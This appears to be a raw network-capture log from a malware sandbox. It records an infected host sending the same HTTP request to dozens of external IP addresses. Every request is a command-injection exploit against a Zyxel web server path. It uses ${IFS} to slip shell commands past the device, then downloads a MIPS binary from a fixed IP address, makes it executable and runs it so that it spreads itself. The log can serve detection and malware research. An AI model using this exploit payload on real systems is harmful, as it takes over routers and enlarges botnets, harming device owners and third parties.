                                                        Feb 2, 2024 06:21:19.110433102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6583192.168.2.1440676132.206.59.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110456944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6584192.168.2.1442002176.49.117.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110495090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6585192.168.2.1446554147.6.81.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110544920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6586192.168.2.146067680.189.179.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110584021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6587192.168.2.1460976205.110.172.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110609055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6588192.168.2.144035873.214.15.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110666037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6589192.168.2.145885291.156.32.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110697031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6590192.168.2.1455482162.132.40.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110749006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6591192.168.2.145302075.102.138.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110781908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6592192.168.2.1453880176.121.173.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110820055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6593192.168.2.143842682.197.147.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110845089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6594192.168.2.1434566104.17.72.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110909939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6595192.168.2.144589671.113.95.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110963106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6596192.168.2.144918691.24.133.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111016035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6597192.168.2.1435206120.10.89.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111036062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6598192.168.2.143663670.15.235.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111092091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6599192.168.2.143537063.160.172.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111145973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6600192.168.2.1455298192.6.2.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111171007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6601192.168.2.14501844.149.98.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111201048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6602192.168.2.1445690190.174.120.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111243010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6603192.168.2.1460972146.154.96.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111310959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6604192.168.2.144663460.33.128.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111332893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6605192.168.2.1460610201.185.225.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111397028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6606192.168.2.145268019.132.243.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111434937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6607192.168.2.145826470.249.141.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111464024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6608192.168.2.144720447.8.246.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111488104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6609192.168.2.143726449.114.28.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111541986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6610192.168.2.1436706119.30.68.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111582994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6611192.168.2.1452978174.34.54.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111607075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6612192.168.2.145159824.239.137.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111660004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6613192.168.2.1435930205.206.147.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111679077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6614192.168.2.1436346195.94.75.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111710072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6615192.168.2.1447054112.82.253.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111767054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6616192.168.2.143379687.189.181.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111793995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6617192.168.2.145217452.3.98.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111845016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6618192.168.2.1458448209.111.8.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111890078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6619192.168.2.145684851.71.75.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111924887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6620192.168.2.1449090159.255.231.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111954927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6621192.168.2.1442030191.36.228.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.111988068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6622192.168.2.1451546156.32.203.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112030029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6623192.168.2.1444164153.55.129.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112073898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6624192.168.2.143455657.208.120.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112126112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6625192.168.2.145993450.204.57.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112166882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6626192.168.2.1459512145.134.33.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112189054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6627192.168.2.1455438204.200.74.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112221003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6628192.168.2.1449730112.110.126.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112318993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6629192.168.2.144647240.17.159.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112330914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6630192.168.2.145578077.45.97.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112358093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6631192.168.2.145831854.141.8.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112390041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6632192.168.2.145337491.159.200.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112420082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6633192.168.2.1458650151.118.174.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112443924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6634192.168.2.144996695.63.147.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112524986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6635192.168.2.144633862.157.140.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112564087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6636192.168.2.143711688.229.221.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112588882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6637192.168.2.1443056111.80.59.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112621069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6638192.168.2.1446858165.75.153.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112651110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6639192.168.2.144516025.175.63.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112690926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6640192.168.2.1449786185.74.191.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112716913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6641192.168.2.143934873.188.70.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112768888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6642192.168.2.1440968157.126.61.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112801075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6643192.168.2.145052427.75.114.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112860918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6644192.168.2.143364081.119.65.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.112885952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6645192.168.2.143581073.210.34.233443
                                                        TimestampBytes transferredDirectionData
